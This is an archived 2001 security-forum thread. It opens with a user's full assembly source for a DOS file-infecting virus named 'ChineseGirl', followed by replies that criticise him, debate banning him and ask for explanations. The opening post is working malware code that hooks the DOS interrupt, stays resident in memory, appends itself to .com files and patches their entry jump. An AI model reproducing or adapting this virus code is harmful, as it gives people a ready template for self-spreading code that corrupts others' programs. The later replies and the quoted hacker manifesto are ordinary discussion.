-
December 7th, 2001, 09:05 AM
#1
nakoka's "ChineseGirl"
THis is My first Virus in my life.She called ChineseGirl.I had Finished it about 2years ago.it just a small Virus. I belive "assemble language + C = nuclear weapon" all the time!
code segment
assume cs:code,ds:code
org 0h
begin :
push ax
push bx
push cx
push dx
push bp
push si
push di
push ds
push es
jmp ChineseGirl
handle dw ?
jmp db 0e9h
message db 'ChineseGirl! $'
len dw ?
real dw ?
dss dw ?
path db '*.com',0
fpath db '\dos\*.com',0
dos db '\dos\',13 dup(?)
no db 'Z'
hh dd 11112222h
tc db 2eh
tc1 dw 2effh
tc2 dw 004ah
dta db 45 dup(?)
zd proc far
mov bx,cs
mov es,bx
mov ds,bx
push es
mov bx,8d00h
mov es,bx
cmp byte ptr es:[0049h],'D'
pop es
je o1
jmp o
o1:
push es
mov bx,0
mov es,bx
cmp word ptr es:[86h],8d00h
pop es
je nochg
o:
save_21:
push es
mov ax,3521h
int 21h
mov di,offset hh
call oldlen
add di,ax
mov [di+2],bx
mov [di+2+2],es
pop es
jmp zg
stop1:
jmp stop
zg:
mov ax,ds:[101h]
add ax,3
add ax,100h
mov si,ax
mov ax,8d00h
push es
mov es,ax
mov di,0
mov cx,673
rep movsb
mov byte ptr es:[49h],'D'
pop es
push ds
mov ds,ax
mov ah,tc
mov byte ptr [di],ah
mov ax,tc1
mov word ptr [di+1],ax
mov ax,tc2
mov word ptr [di+3],ax
pop ds
chage_21h:
push ds
mov ax,8d00h
mov ds,ax
mov ax,2521h
mov dx,0
int 21h
pop ds
jmp stop
nochg:
mov bx,cs
cmp bx,8d00h
jne stop
cmp ah,30h
je n
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
jmp cs:hh
n:
mov dx,offset dta
mov ah,1ah
int 21h
mov ah,2ch
int 21h
cmp ch,22
jb fn
mov dx,offset fpath
jmp f
fn: mov dx,offset path
f:
mov ah,4eh
mov cx,0
int 21h
start:
cmp ax,0002
jz stop
cmp ax,0003
je stop
cmp ax,0018
je stop
jmp open
stop:jmp bdend
open:
mov ah,2ch
int 21h
cmp ch,22
jb ro
mov di,offset dos +5
mov bx,offset dta +30
mov dx,offset dos
mov si,bx
mov cx,13
rep movsb
jmp roc
ro: mov dx,offset dta +30
roc:
mov al,2
mov ah,3dh
int 21h
mov bx,ax
mov dx,offset handle
mov si,dx
mov [si],bx
readlen:
mov dx,offset dta+26
mov si,dx
mov bx,[si]
c:
mov dx,offset dss
mov si,dx
mov [si],bx
add bx,100h
sub bx,103h
mov dx,offset len
mov si,dx
mov [si],bx
read:
mov al,0
mov dx,1
mov cx,0
call seek
mov dx,offset handle
mov si,dx
mov bx,[si]
mov dx,offset real
mov ah,3fh
mov cx,2
int 21h
mov si,dx
push si
mov bx,[si]
add bx,103h
mov dx,offset dss
mov si,dx
mov dx,bx
sub dx,100h
add dx,673+3
cmp dx,[si]
jne ee
pop si
jmp close
ee: push si
add [si],100h+673
sub bx,3
pop si
sub bx,[si]
pop si
mov [si],bx
writebd:
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,673
mov dx,offset begin
call write
writee9:
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,1
mov dx,offset jmp
call write
writejmp:
mov dx,1
mov cx,0
mov al,0
call seek
mov cx,2
mov dx,offset len
call write
writereal:
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,2
mov dx,offset real
call write
close:
mov dx,offset handle
mov si,dx
mov ah,3eh
mov bx,[si]
int 21h
mov ah,2ch
int 21h
cmp ch,22
jb findnext
print:
mov dx,offset message
mov ah,09h
int 21h
findnext:
mov ah,2ch
int 21h
cmp ch,22
jb fnn
mov dx,offset fpath
jmp fff
fnn: mov dx,offset path
fff:
mov ah,4fh
int 21h
jmp start
int 20h
zd endp
seek proc near
push ax
mov bx,offset handle
mov si,bx
mov bx,[si]
pop ax
mov ah,42h
int 21h
ret
seek endp
oldlen proc near
mov ax,cs:[101h]
add ax,101h
ret
oldlen endp
write proc near
mov bx,offset handle
mov si,bx
mov ah,40h
mov bx,[si]
int 21h
ret
write endp
bdend:
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
code ends
end begin
-
December 7th, 2001, 11:32 AM
#2
Senior Member
-
December 7th, 2001, 01:27 PM
#3
Hmmm...Nakoka, I'm not really sure what you're trying to accomplish here. If you're trying to show your 'prowess' with assembly, I'm not seeing many people who actually care. If
you're trying to outdo the other people here who actually have proven they know what they're talking about, observe the relative silence you're getting. Why don't you write something that's for the 'good' of the computer world (if your program actually does anything worthwhile and it's not a copy/paste job like I think it is) instead of trying to be a "badass"?
We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
-
December 7th, 2001, 01:51 PM
#4
Member
Hey Fella. I have a question. Why do you keep posting stuff like this? The majority of us are here to learn what we can about protecting ourselves and our resources from people like you.
-
December 7th, 2001, 04:04 PM
#5
Member
foul smell....
Would someone please take the garbage out???? It would be greatly appreciated if *cough*nakoka*cough* was removed or silenced.
-
December 7th, 2001, 04:55 PM
#6
nakoka is posting some wierd stuff but at least he's not being a total pain in the ass (unlike hehebris).
Why silence this?
Big brother move over.. cheez_cake's in town!
-
December 7th, 2001, 05:13 PM
#7
Member
alright then
wellll, I wouldn't call myself big brother by far!!!!!! but if everyone wants a toy... it is Christmas so I'll grant everyone that. nakoka is now officially the town (AO) fool for all to brow beat until the first of the year. That is my decree...
For those of you who don't celebrate Christmas... may this be your gift for your holiday (Ramastand, Hanukah, Kwanzaa, Yule, etc....)
-
December 7th, 2001, 06:41 PM
#8
I said it before, and I'll say it again: I like source code posts. Most of his other posts are another story though - but don't ban him for this.
-
December 7th, 2001, 07:06 PM
#9
I agree Guus. Apparently this guy got some talent, too bad he can't explain the code some more to make it easier for us non-assembley guys to understand. He better stop programming and take an english course. What do you say, nakoka?
-
December 7th, 2001, 08:07 PM
#10
Junior Member
I think hes just trying to help
I think hes just trying to help those of us who don't know how to do things of this sort. Perhaps he wants to brag a bit but I think we should allow him that. He obviously knows what he is talking about and I believe that he should not be punished for that. These forums are here to learn from. I do agree with the others on the fact that you could explain a little more what your code does and how we could be able to do something similar, but please keep posting. I for one find it interesting.
\"This is our world now...the world of the electron and the switch, the beauty of the baud.
We make use of a service already existing without paying for what could be dirt cheep if it
wasn\'t run by profiteering gluttons, and you call us criminals. We explore...and you call us
criminals. We exist without skin color, without nationality, without religious bias...and you
call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to
make us believe it is for our own good, yet we\'re the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by
what they say and think, not what they look like. My crime is that of outsmarting you, something
that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this
individual, but you can\'t stop us all...after all, we\'re all alike.\"
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|